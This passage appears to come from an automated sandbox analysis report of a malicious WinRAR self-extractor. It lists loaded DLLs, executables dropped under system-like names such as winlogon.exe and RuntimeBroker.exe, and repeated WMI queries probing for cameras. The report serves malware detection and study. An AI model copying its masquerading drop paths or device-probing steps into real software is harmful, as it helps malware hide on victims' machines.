                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: version.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: slc.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: mmdevapi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ksuser.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: avrt.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: audioses.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: midimap.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: voed9G7p5s.exeStatic file information: File size 2342562 > 1048576
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: voed9G7p5s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: voed9G7p5s.exe
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeFile created: C:\savesSession\__tmp_rar_sfx_access_check_3787062Jump to behavior
                          Source: voed9G7p5s.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1F640 push ecx; ret 0_2_00E1F653
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1EB78 push eax; ret 0_2_00E1EB96
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6AB35 push edi; iretd 4_2_00007FFD9BC6AB36
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC70B04 pushfd ; iretd 4_2_00007FFD9BC70B2A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6AA77 push edi; iretd 4_2_00007FFD9BC6AA78
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6A9A6 push edi; iretd 4_2_00007FFD9BC6A9A7
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC65924 push esi; iretd 4_2_00007FFD9BC6592A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC658F2 push esi; iretd 4_2_00007FFD9BC6592A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6B085 pushad ; iretd 4_2_00007FFD9BC6B099
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6F85B push edi; iretd 4_2_00007FFD9BC6F85C
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6F78B push edi; iretd 4_2_00007FFD9BC6F78C
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6F6CA push edi; iretd 4_2_00007FFD9BC6F6CB
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BD14262 push es; ret 4_2_00007FFD9BD14264
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BD15619 push edx; retf 4_2_00007FFD9BD15621
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BD24262 push es; ret 9_2_00007FFD9BD24264
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BD25619 push edx; retf 9_2_00007FFD9BD25621
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9C1B96E2 push E95B40BFh; ret 9_2_00007FFD9C1B96F9
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9C1B000A push esp; iretd 9_2_00007FFD9C1B004A
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\MqhNXtrC.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\lAIZxBgi.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\savesSession\winlogon.exeJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\HufwPOBJ.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\Default\Videos\OfficeClickToRun.exeJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\yZRgoalJ.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\ERuFRGqx.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\vomPhMaQ.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Program Files (x86)\jDownloader\config\dllhost.exeJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\odsQwJqu.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\HCaVYTBq.logJump to dropped file
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeFile created: C:\savesSession\ComponentBrokermonitor.exeJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\PYnlzHQq.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\jpaRTMbF.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\eKDszVMz.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\yIzGwiSf.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\gNqaUEQu.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\JfKMXbLC.logJump to dropped file
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
